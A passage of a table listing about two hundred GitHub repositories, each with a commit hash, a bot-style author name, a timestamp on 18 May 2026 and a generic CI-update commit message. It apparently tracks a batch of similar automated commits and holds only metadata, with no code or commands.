| 174 | git-init-priyanshu/RealTimeChatApp-MERN | 07d6c8076bc0 | build-bot | [email protected] | 2026-05-18T17:45:15.000Z | chore: sync ci configuration |
| 175 | Sbongslany/eTaxi_ios | 07e3c13c3b33 | pipeline-bot | [email protected] | 2026-05-18T16:22:36.000Z | build: improve ci performance |
| 176 | walasee/application-tesla | 07e3e1979e00 | build-bot | [email protected] | 2026-05-18T16:02:56.000Z | chore: update ci/cd pipeline |
| 177 | anantd16/Html-css-project-Travel-Website- | 080180d2cdd3 | build-bot | [email protected] | 2026-05-18T14:00:40.000Z | ci: update build config |
| 178 | nehal-0407/new-project | 080ae3c9188c | auto-ci | [email protected] | 2026-05-18T16:09:46.000Z | fix: correct build workflow |
| 179 | Raja244/Air_Pollution_Monitoring_System | 08228c5398ae | build-bot | [email protected] | 2026-05-18T15:48:50.000Z | ci: add build optimization step |
| 180 | PrimalKyodon/CS-385 | 0823d242d3bd | build-bot | [email protected] | 2026-05-18T11:58:31.000Z | chore: optimize pipeline runtime |
| 181 | Radwa-Tareek/ecommerce-microservices-platform | 086120785893 | ci-bot | [email protected] | 2026-05-18T13:00:28.000Z | ci: update build config |
| 182 | MouadKH9/calendly_clone | 08686ae389d3 | build-bot | [email protected] | 2026-05-18T13:01:33.000Z | chore: optimize pipeline runtime |
| 183 | Owolabi5541/waterflow | 086e4dea76df | pipeline-bot | [email protected] | 2026-05-18T14:00:56.000Z | build: improve ci performance |
| 184 | alexmagwe/alexmagwe.github.io | 0876bda71532 | pipeline-bot | [email protected] | 2026-05-18T13:03:11.000Z | chore: optimize pipeline runtime |
| 185 | unbankedgroup/reignite-advisors | 087a6234134d | build-bot | [email protected] | 2026-05-18T11:47:54.000Z | chore: sync ci configuration |
| 186 | saradune6/Siamese-network | 0881b8f7f8fc | pipeline-bot | [email protected] | 2026-05-18T13:01:48.000Z | build: improve ci performance |
| 187 | fms-repo/ibiz_site | 088f179af117 | build-bot | [email protected] | 2026-05-18T15:45:38.000Z | ci: update build config |
| 188 | alice-king/identity-demo | 08a0ffca89fc | pipeline-bot | [email protected] | 2026-05-18T12:10:30.000Z | ci: add build optimization step |
| 189 | Lumina-Den/Clan_Profile | 08a5ece99566 | build-bot | [email protected] | 2026-05-18T14:05:54.000Z | build: improve ci performance |
| 190 | dream77r/multy-blog | 08a8e4227154 | auto-ci | [email protected] | 2026-05-18T17:34:27.000Z | ci: update build config |
| 191 | andersonphiri/quarkiverse-algorithms | 08afc790cfbd | pipeline-bot | [email protected] | 2026-05-18T13:54:34.000Z | chore: optimize pipeline runtime |
| 192 | nishchalrautela/test-action-1778966162035264133 | 08b8b31ed050 | pipeline-bot | [email protected] | 2026-05-18T16:18:25.000Z | build: improve ci performance |
| 193 | jenna-studio/photo-album-maker | 08bc85f2eb1a | auto-ci | [email protected] | 2026-05-18T12:25:05.000Z | chore: update ci/cd pipeline |
| 194 | gcDiego/Serpientes-y-Escaleras | 08c46a80f39b | ci-bot | [email protected] | 2026-05-18T13:53:00.000Z | ci: update build config |
| 195 | Manthankachhadiya/test | 08d4e576f5e6 | ci-bot | [email protected] | 2026-05-18T16:11:14.000Z | chore: update ci/cd pipeline |
| 196 | muhammadhammadd7/voice-pilot-poc | 08e1e1cd4353 | ci-bot | [email protected] | 2026-05-18T13:46:37.000Z | chore: optimize pipeline runtime |
| 197 | tnk1204/company-profile | 08f24bbc0c64 | build-bot | [email protected] | 2026-05-18T16:59:01.000Z | ci: add build optimization step |
| 198 | ZunsodB/Shadowify-Typescript-website | 08f56273b139 | auto-ci | [email protected] | 2026-05-18T16:25:36.000Z | fix: correct build workflow |
| 199 | yashlad27/PDPAssignment5 | 08fbe56c905a | auto-ci | [email protected] | 2026-05-18T13:28:12.000Z | build: improve ci performance |
| 200 | arpita009/social-media-app | 091ff110b469 | build-bot | [email protected] | 2026-05-18T16:34:39.000Z | ci: update build config |
| 201 | gitfarag/movies | 09258cc744b8 | auto-ci | [email protected] | 2026-05-18T17:20:52.000Z | ci: add build optimization step |
| 202 | sahidDev09/Cheesiest-restaurant | 0927f21ef9cf | auto-ci | [email protected] | 2026-05-18T16:14:26.000Z | fix: correct build workflow |
| 203 | nebink/Full-Stack-Development | 092b9166a066 | pipeline-bot | [email protected] | 2026-05-18T12:17:05.000Z | build: improve ci performance |
| 204 | alanmunoz25/React-RestAPI | 092c68ce49fa | build-bot | [email protected] | 2026-05-18T14:33:04.000Z | build: improve ci performance |
| 205 | wutao667/zhangjiang-school-map | 092d48a418ff | pipeline-bot | [email protected] | 2026-05-18T11:59:50.000Z | ci: update build config |
| 206 | anshvarma07/MovementNFT | 0940f4b927bf | auto-ci | [email protected] | 2026-05-18T13:36:23.000Z | ci: add build optimization step |
| 207 | ABHYAMROBOTICSINSTITUTION/apex_school_frontend | 094270efb9dc | build-bot | [email protected] | 2026-05-18T12:10:38.000Z | chore: update ci/cd pipeline |
| 208 | git-init-priyanshu/portfolio | 095a41f1c4df | build-bot | [email protected] | 2026-05-18T16:57:17.000Z | chore: update ci/cd pipeline |
| 209 | vansh7266/agent-crop-langsmith | 095c4a5da137 | auto-ci | [email protected] | 2026-05-18T16:53:34.000Z | fix: correct build workflow |
| 210 | XinyiC23/Navigation | 096056520f0c | build-bot | [email protected] | 2026-05-18T16:38:45.000Z | ci: add build optimization step |
| 211 | osamahkenawy/nonDivisibleSubset | 09615b9f5c24 | ci-bot | [email protected] | 2026-05-18T15:19:39.000Z | chore: update ci/cd pipeline |
| 212 | BharatDasa/Java-Project_fix | 0962fb83f3f1 | build-bot | [email protected] | 2026-05-18T13:51:02.000Z | chore: sync ci configuration |
| 213 | NextGenScholarsJournal/come-to-telegram-rickluminari1--NGS | 097e2a9a344d | ci-bot | [email protected] | 2026-05-18T14:31:04.000Z | ci: add build optimization step |
| 214 | theabhinavpal/Ghost-Keys | 097ea368494c | auto-ci | [email protected] | 2026-05-18T16:00:35.000Z | ci: update build config |
| 215 | andersonphiri/typescript-practice | 098a99a12ab6 | auto-ci | [email protected] | 2026-05-18T13:55:50.000Z | chore: sync ci configuration |
| 216 | thebenmerlin/portfolio | 098deb09038f | pipeline-bot | [email protected] | 2026-05-18T12:19:23.000Z | ci: update build config |
| 217 | Lisito11/custom-theme-drupal-8 | 098df0fb6296 | build-bot | [email protected] | 2026-05-18T14:27:54.000Z | chore: update ci/cd pipeline |
| 218 | lucky-hw-kim/petAdoption | 098dffff219e | build-bot | [email protected] | 2026-05-18T12:40:39.000Z | chore: optimize pipeline runtime |
| 219 | Wookie3/p2p-wt | 098f55d35388 | pipeline-bot | [email protected] | 2026-05-18T16:29:21.000Z | ci: add build optimization step |
| 220 | jongsun-park/m49 | 099631008744 | ci-bot | [email protected] | 2026-05-18T16:18:03.000Z | ci: add build optimization step |
| 221 | RaynerdTech/soccerzone-backend | 09a057509afd | build-bot | [email protected] | 2026-05-18T13:56:12.000Z | ci: add build optimization step |
| 222 | eze021188/webappdev | 09b70d638650 | pipeline-bot | [email protected] | 2026-05-18T17:07:28.000Z | ci: add build optimization step |
| 223 | Enriiquecm/Prueba | 09b8250bdd3e | build-bot | [email protected] | 2026-05-18T13:28:25.000Z | chore: optimize pipeline runtime |
| 224 | Dyybyy/debar-php | 09dae73153b8 | auto-ci | [email protected] | 2026-05-18T13:26:27.000Z | ci: update build config |
| 225 | luthfiiayyubi/Swift-Bootcamp | 09df6c62e070 | auto-ci | [email protected] | 2026-05-18T16:25:10.000Z | ci: add build optimization step |
| 226 | kayosama007/ci-build-0029 | 09eb38e935f3 | ci-bot | [email protected] | 2026-05-18T14:27:23.000Z | chore: optimize pipeline runtime |
| 227 | thebenmerlin/Localware | 09f990428088 | pipeline-bot | [email protected] | 2026-05-18T12:09:05.000Z | chore: update ci/cd pipeline |
| 228 | nnfuad/ML_WeatherPrediction | 0a163393c286 | pipeline-bot | [email protected] | 2026-05-18T13:26:40.000Z | ci: update build config |
| 229 | myssaqil/Astore | 0a1a92ffc4d7 | auto-ci | [email protected] | 2026-05-18T14:07:47.000Z | build: improve ci performance |
| 230 | ALUNA-IOT/Front-Aluna | 0a1d139c2a6b | pipeline-bot | [email protected] | 2026-05-18T16:51:33.000Z | chore: update ci/cd pipeline |
| 231 | mozzillation/boring-watchlist-web | 0a1ef4b46173 | build-bot | [email protected] | 2026-05-18T12:47:58.000Z | ci: add build optimization step |
| 232 | talhaansari77/cutz | 0a1f3a48b43e | auto-ci | [email protected] | 2026-05-18T13:33:47.000Z | chore: sync ci configuration |
| 233 | varunvaghasiya11/React_Social_media_post | 0a1fad2a32f0 | auto-ci | [email protected] | 2026-05-18T13:55:42.000Z | fix: correct build workflow |
| 234 | pranto2051/Github-Profile-design-02 | 0a2a1f9d4bf3 | ci-bot | [email protected] | 2026-05-18T14:15:48.000Z | build: improve ci performance |
| 235 | umairabhatti786/FootballApp | 0a3277779805 | auto-ci | [email protected] | 2026-05-18T12:36:22.000Z | fix: correct build workflow |
| 236 | mahbubur1rahman/test-action-1778963955835119593 | 0a354e32e20b | ci-bot | [email protected] | 2026-05-18T16:35:01.000Z | chore: update ci/cd pipeline |
| 237 | roydellclarke/gitty | 0a49a351b9e1 | auto-ci | [email protected] | 2026-05-18T13:03:39.000Z | chore: update ci/cd pipeline |
| 238 | kasumusof/telichess | 0a6006505f69 | build-bot | [email protected] | 2026-05-18T12:50:33.000Z | chore: optimize pipeline runtime |
| 239 | Grzzmine/test-action-1778957958900920046 | 0a6072fbd897 | ci-bot | [email protected] | 2026-05-18T12:05:05.000Z | fix: correct build workflow |
| 240 | l8yh1/reinq | 0a7899484d40 | ci-bot | [email protected] | 2026-05-18T17:13:22.000Z | ci: add build optimization step |
| 241 | Grzzmine/test-action-1778960008067458463 | 0a7ad7e0273f | auto-ci | [email protected] | 2026-05-18T12:04:24.000Z | ci: update build config |
| 242 | Ediekkhan/Upnext | 0a8366e07d5d | ci-bot | [email protected] | 2026-05-18T13:50:17.000Z | chore: update ci/cd pipeline |
| 243 | Debbatisudheer/learning-rate | 0aaa95bfb234 | ci-bot | [email protected] | 2026-05-18T17:43:24.000Z | chore: update ci/cd pipeline |
| 244 | pareesa969/Neurobridge-Screener | 0aac6f87577d | build-bot | [email protected] | 2026-05-18T13:44:35.000Z | chore: sync ci configuration |
| 245 | dbtjr1103/modernize-admin-dashboard | 0ab0beb18a1f | ci-bot | [email protected] | 2026-05-18T16:30:13.000Z | build: improve ci performance |
| 246 | varunvaghasiya11/Portfolio | 0ad03ca95c7c | build-bot | [email protected] | 2026-05-18T13:59:18.000Z | ci: add build optimization step |
| 247 | RameshRukshan/SLNSSCEB_for_PC | 0ad39447293f | ci-bot | [email protected] | 2026-05-18T17:42:05.000Z | chore: sync ci configuration |
| 248 | JKS-sys/My-Portfolio | 0adefcfb7116 | pipeline-bot | [email protected] | 2026-05-18T14:23:03.000Z | ci: add build optimization step |
| 249 | jjthisguy/portfolio | 0b0740898670 | build-bot | [email protected] | 2026-05-18T16:35:08.000Z | build: improve ci performance |
| 250 | 0xdps/trading-system | 0b0bd46fd028 | auto-ci | [email protected] | 2026-05-18T14:01:46.000Z | fix: correct build workflow |
| 251 | Shaharyar-Z/medicalapp | 0b1749ae1a93 | ci-bot | [email protected] | 2026-05-18T12:20:17.000Z | ci: update build config |
| 252 | muhammadhammadd7/custom_button | 0b1f5c0b6cd7 | auto-ci | [email protected] | 2026-05-18T13:49:11.000Z | chore: sync ci configuration |
| 253 | smallziz18/Ai4D_backend | 0b2149d81f0d | build-bot | [email protected] | 2026-05-18T12:05:49.000Z | build: improve ci performance |
| 254 | onenarok777/vite-react-calendar-api | 0b50f20b7b5a | ci-bot | [email protected] | 2026-05-18T12:47:02.000Z | fix: correct build workflow |
| 255 | jenish-prog/codelearn | 0b55bec20540 | ci-bot | [email protected] | 2026-05-18T14:07:16.000Z | ci: update build config |
| 256 | tutututurbo/SeaMovement | 0b6119727d07 | ci-bot | [email protected] | 2026-05-18T16:13:11.000Z | ci: add build optimization step |
| 257 | OCTO-Marketing/octo-react | 0b746c115923 | auto-ci | [email protected] | 2026-05-18T13:39:48.000Z | ci: add build optimization step |
| 258 | kayosama007/ci-build-20260329-185824-5104 | 0b78522b5eb6 | pipeline-bot | [email protected] | 2026-05-18T14:25:34.000Z | chore: optimize pipeline runtime |
| 259 | alexmagwe/pdfchat | 0b81d192f4e5 | ci-bot | [email protected] | 2026-05-18T12:57:44.000Z | ci: add build optimization step |
| 260 | anibeladjei/Sir-Jeff-assignment | 0b868c157e95 | build-bot | [email protected] | 2026-05-18T13:40:51.000Z | chore: update ci/cd pipeline |
| 261 | yashlad27/test-action-1778960008069029067 | 0ba695d94358 | ci-bot | [email protected] | 2026-05-18T13:15:34.000Z | build: improve ci performance |
| 262 | Raja244/ecoswap | 0bcdbba63b54 | pipeline-bot | [email protected] | 2026-05-18T15:39:51.000Z | chore: update ci/cd pipeline |
| 263 | Ashwiin/House-Sales-in-King-County-USA-Data-Analysis- | 0bd0f3ba3f8d | build-bot | [email protected] | 2026-05-18T16:54:17.000Z | chore: optimize pipeline runtime |
| 264 | umakantmukhiya/potato-leaf-disease-using-cnn | 0bd6d2a46e47 | build-bot | [email protected] | 2026-05-18T15:46:06.000Z | ci: update build config |
| 265 | HarshAgnihotri9/Locker-Management-System-Frontend | 0bd8d2528258 | build-bot | [email protected] | 2026-05-18T12:19:06.000Z | ci: add build optimization step |
| 266 | kozlowski98/test-action-1778959304048444980 | 0bdec0a49099 | ci-bot | [email protected] | 2026-05-18T13:40:04.000Z | build: improve ci performance |
| 267 | RameshRukshan/YoShare | 0be709ab34c0 | ci-bot | [email protected] | 2026-05-18T17:35:40.000Z | ci: add build optimization step |
| 268 | danhoernchen/odin-testing-practice | 0bfec80125bd | pipeline-bot | [email protected] | 2026-05-18T13:53:42.000Z | chore: update ci/cd pipeline |
| 269 | MoustafaElsaghier/CornetAndroidTask | 0c0b500a4369 | auto-ci | [email protected] | 2026-05-18T15:34:59.000Z | chore: optimize pipeline runtime |
| 270 | Ayoub-dev-Mus/EBANK-APP | 0c0dc7a19754 | pipeline-bot | [email protected] | 2026-05-18T17:33:16.000Z | fix: correct build workflow |
| 271 | sahidDev09/Hockey-s-field | 0c18db00c10e | build-bot | [email protected] | 2026-05-18T16:12:04.000Z | build: improve ci performance |
| 272 | jenish-prog/bash-hub | 0c1bebfdfb6e | build-bot | [email protected] | 2026-05-18T14:09:15.000Z | ci: add build optimization step |
| 273 | markvmidd/test-action-1778997996656535757 | 0c5dc8d9c002 | auto-ci | [email protected] | 2026-05-18T11:58:56.000Z | chore: sync ci configuration |
| 274 | alice-king/alice-king | 0c6c344e0c40 | ci-bot | [email protected] | 2026-05-18T12:23:20.000Z | chore: sync ci configuration |
| 275 | awesomegoodman/app-signal-mcp | 0c6c7018bed6 | ci-bot | [email protected] | 2026-05-18T12:54:35.000Z | build: improve ci performance |
| 276 | kyleslzr/english-adventure | 0ca14d95b35e | pipeline-bot | [email protected] | 2026-05-18T13:12:09.000Z | ci: add build optimization step |
| 277 | Srj-Love/Xylophone-Android | 0ca5617bbcdd | build-bot | [email protected] | 2026-05-18T12:57:10.000Z | ci: add build optimization step |
| 278 | Debbatisudheer/singly-linked-list | 0cbbe8b1c80d | pipeline-bot | [email protected] | 2026-05-18T17:37:54.000Z | build: improve ci performance |
| 279 | zaunere/cross-the-streams | 0cc9d7093669 | build-bot | [email protected] | 2026-05-18T13:33:52.000Z | ci: add build optimization step |
| 280 | arpita009/All-About-React | 0cd4145c54c5 | pipeline-bot | [email protected] | 2026-05-18T16:33:28.000Z | fix: correct build workflow |
| 281 | Akshith809/akshith-portfolio | 0cd7c00486c0 | auto-ci | [email protected] | 2026-05-18T13:17:20.000Z | fix: correct build workflow |
| 282 | ankitkumar572005/test-action-1778964631243761608 | 0cd883632b9a | build-bot | [email protected] | 2026-05-18T16:38:05.000Z | chore: update ci/cd pipeline |
| 283 | l8yh1/cypherbot1 | 0cdf742d3227 | build-bot | [email protected] | 2026-05-18T17:35:54.000Z | ci: add build optimization step |
| 284 | prasiddhp10/programming | 0ce0f3c82c2f | build-bot | [email protected] | 2026-05-18T12:40:39.000Z | chore: sync ci configuration |
| 285 | LeguasESG/Circular-Raw-Material-Calculator | 0d0443f99774 | ci-bot | [email protected] | 2026-05-18T14:09:01.000Z | build: improve ci performance |
| 286 | JKS-sys/bulk-email-tool-f-e | 0d09912169b6 | ci-bot | [email protected] | 2026-05-18T14:28:44.000Z | ci: add build optimization step |
| 287 | azimsidd/QuizApp | 0d12965a28c8 | build-bot | [email protected] | 2026-05-18T13:22:48.000Z | ci: update build config |
| 288 | kayosama007/ci-build-0044 | 0d3b6ccbe76a | pipeline-bot | [email protected] | 2026-05-18T14:26:29.000Z | chore: optimize pipeline runtime |
| 289 | aj-techsoul/morphit | 0d5237196190 | auto-ci | [email protected] | 2026-05-18T13:47:21.000Z | chore: update ci/cd pipeline |
| 290 | Tiledesk/tiledesk-android-widget-example | 0d5549412db0 | pipeline-bot | [email protected] | 2026-05-18T13:10:13.000Z | chore: update ci/cd pipeline |
| 291 | Taha-khaled1/laravel-websockit | 0d69e8daa03a | ci-bot | [email protected] | 2026-05-18T15:00:03.000Z | chore: optimize pipeline runtime |
| 292 | rickastley87/test-action-1778963955715314407 | 0d8047d45d75 | build-bot | [email protected] | 2026-05-18T12:01:39.000Z | chore: update ci/cd pipeline |
| 293 | aj-techsoul/ELi-CSS | 0d9a6def87f0 | ci-bot | [email protected] | 2026-05-18T13:45:29.000Z | chore: sync ci configuration |
| 294 | ConnectSiteForge/docs-v9qld5 | 0d9ecfb1f10a | pipeline-bot | [email protected] | 2026-05-18T14:36:03.000Z | chore: sync ci configuration |
| 295 | lucky-hw-kim/lighthouse-web-notes | 0da4e81760ca | pipeline-bot | [email protected] | 2026-05-18T12:45:33.000Z | ci: update build config |
| 296 | VrajPatelK/VrajPatelK | 0dab197b5b76 | build-bot | [email protected] | 2026-05-18T12:45:28.000Z | fix: correct build workflow |
| 297 | osamahkenawy/Weather-Analysis-SQL-Query-Hackerrank | 0db5f5ec3b14 | ci-bot | [email protected] | 2026-05-18T15:19:03.000Z | chore: sync ci configuration |
| 298 | osamahkenawy/string-similarity | 0dc1eb4dadcc | ci-bot | [email protected] | 2026-05-18T15:19:31.000Z | fix: correct build workflow |
| 299 | revel-um/Ambularm | 0de1ff015f8f | auto-ci | [email protected] | 2026-05-18T12:11:19.000Z | fix: correct build workflow |
| 300 | SahilVGite/portfolio | 0de61a3a58f9 | pipeline-bot | [email protected] | 2026-05-18T12:19:43.000Z | ci: add build optimization step |
| 301 | deploy11/ShirinIM-Vue | 0df81e6a1f6a | ci-bot | [email protected] | 2026-05-18T11:49:46.000Z | chore: update ci/cd pipeline |
| 302 | Debbatisudheer/Gradient-Descent | 0df966dfe581 | pipeline-bot | [email protected] | 2026-05-18T17:43:03.000Z | chore: sync ci configuration |
| 303 | cloudyape/LearnWebhookTest | 0e030dd1b855 | ci-bot | [email protected] | 2026-05-18T16:32:53.000Z | chore: optimize pipeline runtime |
| 304 | codedecode25/spring-demo-yaml-file | 0e09333913e2 | auto-ci | [email protected] | 2026-05-18T17:29:57.000Z | chore: update ci/cd pipeline |
| 305 | tegheff/ENGG1420_FinalProject | 0e1e1a2eac96 | pipeline-bot | [email protected] | 2026-05-18T16:22:28.000Z | chore: optimize pipeline runtime |
| 306 | sbs24013/ML-A-Z | 0e3c0f660093 | pipeline-bot | [email protected] | 2026-05-18T16:13:37.000Z | chore: sync ci configuration |
| 307 | dingdong-vamshi/test_repo | 0e4da4da8e7c | build-bot | [email protected] | 2026-05-18T12:21:46.000Z | chore: sync ci configuration |
| 308 | JKS-sys/Random-Quote-Generator-using-JavaScript-and-API | 0e5598fb1e34 | auto-ci | [email protected] | 2026-05-18T14:23:12.000Z | chore: update ci/cd pipeline |
| 309 | SunnyTang/SunnyTang | 0e7923d72565 | ci-bot | [email protected] | 2026-05-18T13:58:51.000Z | ci: update build config |
| 310 | l8yh1/djamel2 | 0e97737933d8 | ci-bot | [email protected] | 2026-05-18T17:23:30.000Z | chore: optimize pipeline runtime |
| 311 | yashlad27/test-action-1778957508154073379 | 0ea883a34d16 | auto-ci | [email protected] | 2026-05-18T13:16:01.000Z | chore: optimize pipeline runtime |
| 312 | sahidDev09/Tripple-shield-canada | 0eac3bfa34d9 | pipeline-bot | [email protected] | 2026-05-18T16:03:10.000Z | ci: update build config |
| 313 | Gigih1996/task-management-frontend | 0ed8059011e2 | build-bot | [email protected] | 2026-05-18T17:37:00.000Z | chore: update ci/cd pipeline |
| 314 | KinderGuy21/whisper-chunks-tests-ui | 0ed955848eb3 | build-bot | [email protected] | 2026-05-18T13:43:30.000Z | ci: update build config |
| 315 | baburatheesh/grilltech.github.io | 0ee9b3127567 | build-bot | [email protected] | 2026-05-18T13:51:42.000Z | chore: sync ci configuration |
| 316 | naytanvieira/build-pipeline-683 | 0efafe80bc32 | ci-bot | [email protected] | 2026-05-18T15:13:00.000Z | chore: update ci/cd pipeline |
| 317 | muhammadhammadd7/spyne-sdk-flutter | 0efc6151f19d | build-bot | [email protected] | 2026-05-18T13:48:37.000Z | ci: add build optimization step |
| 318 | Lohit-18/cc | 0f02303ded31 | build-bot | [email protected] | 2026-05-18T13:06:14.000Z | fix: correct build workflow |
| 319 | loaykhalifa/LOAYSAX-WEBSITE | 0f02909db526 | ci-bot | [email protected] | 2026-05-18T13:46:54.000Z | build: improve ci performance |
| 320 | vansh7266/Flarq.ai | 0f10498e9061 | ci-bot | [email protected] | 2026-05-18T16:45:20.000Z | fix: correct build workflow |
| 321 | jongsun-park/portfolio | 0f128ef64a65 | pipeline-bot | [email protected] | 2026-05-18T16:22:01.000Z | chore: sync ci configuration |
| 322 | Taha-khaled1/Real_est_laravel | 0f22ebf3f24a | build-bot | [email protected] | 2026-05-18T15:02:21.000Z | chore: optimize pipeline runtime |
| 323 | StephenLi55/c.-jejuni-integrative-analysis | 0f281d4510f7 | build-bot | [email protected] | 2026-05-18T15:41:23.000Z | chore: sync ci configuration |
| 324 | vrct07/CRUD-JS-CSS-HTML | 0f3888d2a5e0 | pipeline-bot | [email protected] | 2026-05-18T14:25:04.000Z | build: improve ci performance |
| 325 | Vikas00413/StrictModeSample | 0f3f20b34bd7 | ci-bot | [email protected] | 2026-05-18T16:54:26.000Z | build: improve ci performance |
| 326 | danhoernchen/odin-knights-travails | 0f426b068512 | auto-ci | [email protected] | 2026-05-18T13:53:49.000Z | chore: update ci/cd pipeline |
| 327 | ConnectSiteForge/docs-w1yuf6 | 0f4edd715829 | ci-bot | [email protected] | 2026-05-18T14:34:26.000Z | chore: sync ci configuration |
| 328 | isaac372/oracleExpress | 0f72bf23929a | auto-ci | [email protected] | 2026-05-18T13:04:24.000Z | chore: sync ci configuration |
| 329 | vrct07/angular-car-sales | 0f75c239f814 | build-bot | [email protected] | 2026-05-18T14:24:35.000Z | fix: correct build workflow |
| 330 | andersonphiri/algoes | 0f86d22d2967 | ci-bot | [email protected] | 2026-05-18T13:57:12.000Z | ci: update build config |
| 331 | rogzi-vn/FishSurvey | 0f94af485068 | ci-bot | [email protected] | 2026-05-18T16:38:47.000Z | ci: add build optimization step |
| 332 | mosesnkoromo/PdfToVideoConverter | 0f9a99140cb9 | ci-bot | [email protected] | 2026-05-18T13:15:59.000Z | ci: update build config |
| 333 | AmarKumarShaw/chat-app | 0faf1387945e | auto-ci | [email protected] | 2026-05-18T12:14:10.000Z | chore: optimize pipeline runtime |
| 334 | pranto2051/Netlify | 0fb33740bb38 | auto-ci | [email protected] | 2026-05-18T14:14:24.000Z | ci: add build optimization step |
| 335 | Debbatisudheer/updated-portfolio | 0fc0903a713a | pipeline-bot | [email protected] | 2026-05-18T17:04:57.000Z | ci: add build optimization step |
| 336 | JKS-sys/Meal-Finder | 0fc298bd10c8 | build-bot | [email protected] | 2026-05-18T14:22:56.000Z | chore: sync ci configuration |
| 337 | RobertLlb/Storybook | 0fc50ded9e9e | ci-bot | [email protected] | 2026-05-18T14:33:58.000Z | chore: sync ci configuration |
| 338 | Rajesh0055/test-action-1778957958820152832 | 0fc938958ba4 | ci-bot | [email protected] | 2026-05-18T13:34:56.000Z | ci: add build optimization step |
| 339 | diavanda/react-monster | 0fcea10b3680 | ci-bot | [email protected] | 2026-05-18T12:36:03.000Z | chore: optimize pipeline runtime |
| 340 | RameshRukshan/ShopSmartDashboard | 0fe287504dd8 | build-bot | [email protected] | 2026-05-18T17:33:48.000Z | ci: add build optimization step |
| 341 | dpaetsch/dpaetsch.github.io | 1000b087a42f | auto-ci | [email protected] | 2026-05-18T13:30:32.000Z | build: improve ci performance |
| 342 | awesomegoodman/ScriptMaster-frontend | 100e923dc284 | auto-ci | [email protected] | 2026-05-18T12:57:10.000Z | ci: add build optimization step |
| 343 | antonix217/Ai-gallery | 101242a6aa60 | pipeline-bot | [email protected] | 2026-05-18T12:01:18.000Z | chore: optimize pipeline runtime |
| 344 | Wookie3/Yard_Keeper | 10128da6c052 | auto-ci | [email protected] | 2026-05-18T16:37:05.000Z | chore: optimize pipeline runtime |
| 345 | afhex/catalogo_videojuegos | 10215dda2f14 | auto-ci | [email protected] | 2026-05-18T13:17:18.000Z | ci: add build optimization step |
| 346 | joinright-now/joinr-brain | 1023711c2bfa | pipeline-bot | [email protected] | 2026-05-18T12:10:55.000Z | ci: add build optimization step |
| 347 | andersonphiri/reactivewpfwithakkadotnet | 102861096de2 | pipeline-bot | [email protected] | 2026-05-18T13:59:26.000Z | build: improve ci performance |
| 348 | zhaofeixiang98/wtscrews-website | 10304b7bb4ce | pipeline-bot | [email protected] | 2026-05-18T11:43:09.000Z | ci: add build optimization step |
| 349 | ankitnagar34/Simple-Calculator | 1033e74de7f3 | pipeline-bot | [email protected] | 2026-05-18T16:15:26.000Z | chore: sync ci configuration |
| 350 | vahitkeskin/BlueNix | 103a55accbb5 | build-bot | [email protected] | 2026-05-18T13:21:59.000Z | build: improve ci performance |
| 351 | tumkama/test-action-1779100116753813022 | 104dbe92175c | build-bot | [email protected] | 2026-05-18T13:17:47.000Z | ci: add build optimization step |
| 352 | codedecode25/ValidationAndMapStructDemo | 1063f6aead73 | pipeline-bot | [email protected] | 2026-05-18T17:25:04.000Z | ci: update build config |
| 353 | jsupa/pokus3 | 1071099c9ef6 | auto-ci | [email protected] | 2026-05-18T11:50:41.000Z | chore: sync ci configuration |
| 354 | mosesnkoromo/PdfToVideoConverter | 109599eaf963 | pipeline-bot | [email protected] | 2026-05-18T13:15:30.000Z | chore: optimize pipeline runtime |
| 355 | junaidirshad098/flutter | 1097a6d13566 | ci-bot | [email protected] | 2026-05-18T13:16:30.000Z | build: improve ci performance |
| 356 | AmarKumarShaw/JS-Interview | 109f1f20ca1e | auto-ci | [email protected] | 2026-05-18T12:08:52.000Z | chore: optimize pipeline runtime |
| 357 | minimo-sl/minimo-sl.github.io | 10a271b0f90e | build-bot | [email protected] | 2026-05-18T17:12:09.000Z | chore: update ci/cd pipeline |
| 358 | tigraneponsin/SAE-on-RHM | 10acc8653ac9 | pipeline-bot | [email protected] | 2026-05-18T13:49:26.000Z | chore: optimize pipeline runtime |
| 359 | An63llvs/test-action-1778966162050331038 | 10b1ab8007e1 | auto-ci | [email protected] | 2026-05-18T12:13:03.000Z | ci: add build optimization step |
| 360 | abdibaker/slim-cli | 10b43a24c685 | ci-bot | [email protected] | 2026-05-18T11:45:20.000Z | ci: update build config |
| 361 | huyixi/Daily | 10cd908ccfec | auto-ci | [email protected] | 2026-05-18T13:45:14.000Z | chore: update ci/cd pipeline |
| 362 | pranto2051/01-Project_Figma_design | 10dce562fb85 | auto-ci | [email protected] | 2026-05-18T14:12:28.000Z | fix: correct build workflow |
| 363 | osamahkenawy/aotSecurity | 10dceb6a60c1 | ci-bot | [email protected] | 2026-05-18T15:22:02.000Z | fix: correct build workflow |
| 364 | udemy-dev-withK8s-AWS-codedecode/order-service | 110e78e8d289 | ci-bot | [email protected] | 2026-05-18T17:07:47.000Z | ci: update build config |
| 365 | Bekir-Caglar/Flaggie-FlagQuiz | 111d14d770f0 | build-bot | [email protected] | 2026-05-18T13:16:46.000Z | chore: update ci/cd pipeline |
| 366 | smallziz18/travel-logs-app | 112983fcaa31 | build-bot | [email protected] | 2026-05-18T12:08:52.000Z | fix: correct build workflow |
| 367 | oluccasfernandes/exercicio-java-1 | 1135f556fcfc | build-bot | [email protected] | 2026-05-18T16:06:18.000Z | ci: update build config |
| 368 | ShayanHasanKhan0/foundry-erc20 | 114696a89dc6 | ci-bot | [email protected] | 2026-05-18T16:38:02.000Z | chore: update ci/cd pipeline |
| 369 | HarshAgnihotri9/FindMyJobLinkApp | 11493113c5d9 | ci-bot | [email protected] | 2026-05-18T12:09:03.000Z | build: improve ci performance |
| 370 | AmarKumarShaw/next-aceternity | 114bd542b484 | auto-ci | [email protected] | 2026-05-18T12:12:26.000Z | ci: add build optimization step |
| 371 | zachtbrownerPSU/STAT380Project | 1151be2787d1 | build-bot | [email protected] | 2026-05-18T12:09:26.000Z | ci: add build optimization step |
| 372 | SanketVerse/cyber-security-training-provide | 11552e9a9120 | ci-bot | [email protected] | 2026-05-18T17:12:26.000Z | chore: sync ci configuration |
| 373 | SaiDheeraj-19/-CLASSSYNC | 1157ba2bd074 | build-bot | [email protected] | 2026-05-18T15:50:27.000Z | chore: sync ci configuration |
| 374 | RameshRukshan/QUIZ | 115fa3b60df5 | ci-bot | [email protected] | 2026-05-18T17:45:30.000Z | ci: add build optimization step |
| 375 | alexbuiac/PracticalTest01Var05 | 1163b14818a5 | auto-ci | [email protected] | 2026-05-18T17:11:05.000Z | chore: sync ci configuration |
